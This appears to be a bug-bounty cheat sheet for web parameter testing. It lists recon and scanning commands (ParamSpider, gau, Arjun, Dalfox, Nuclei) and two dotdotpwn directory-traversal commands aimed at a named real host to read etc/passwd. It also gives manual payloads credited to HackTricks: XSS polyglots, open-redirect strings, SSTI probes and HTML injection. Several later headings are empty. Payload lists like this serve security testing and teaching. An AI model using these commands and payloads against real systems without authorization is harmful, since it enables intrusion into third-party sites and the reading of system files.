Parameters Manual Testing
Automation
# Paramspider | gau | kxss
python3 ParamSpider/paramspider.py -d target | kxss
cat subdomains.txt | gau | grep "?" | kxss
# parameter brute forcing
Arjun -u host.com -w Wordlists/Param-Miner.txt
# Dalfox tool for scanning
Dalfox url host.com?parameters=xss
# Nuclei to fuzz for vulns
nuclei -l parameters.txt -t nuclei_templates/ -et nuclei_templates/waf -et nuclei_templates/others
# DotDotPwn --> <https://github.com/wireghoul/dotdotpwn> --> for Directory Traversal automation
dotdotpwn -m http-url -u "<https://attachrite.dell.com/en/images/TRAVERSAL>" -f "/???/??ss??" -k "root" -d 20 -b -e "%00.png"
dotdotpwn -m http-url -u "<https://attachrite.dell.com/en/images/TRAVERSAL>" -f "etc/passwd" -k "root" -d 20 -bManual Testing (Credit: HackTricks)
XSS
<img src=x onerror=alert("XSS_By_h0tak88r")> <00 foo="<a%20href="javascript:alert('XSS-Bypass')">XSS-CLick</00>--%20/ jaVasCript:/*-/*`/*\\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3eOpen Redirect → SSRF
www.whitelisted.com www.whitelisted.com.evil.com <https://google.com> //google.com javascript:alert(1) <https://evil.com> <https://hackerone.com/reports/59372> -> Homograph Attack
* **CSTI**
SSTI →
{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\\→ RCECommand Injection →
CRLF →
Dangled Markup [ HTML Injection ] →
<br>lol<b><h1>THIS IS AND INJECTED TITLE </h1>Local File Inclusion
ReDOS
Server Side Inclusion/Edge Side Inclusion
XSLT Server Side Injection
Request smuggling -> ATO via request smuggling
SQL Injection
Last updated
Was this helpful?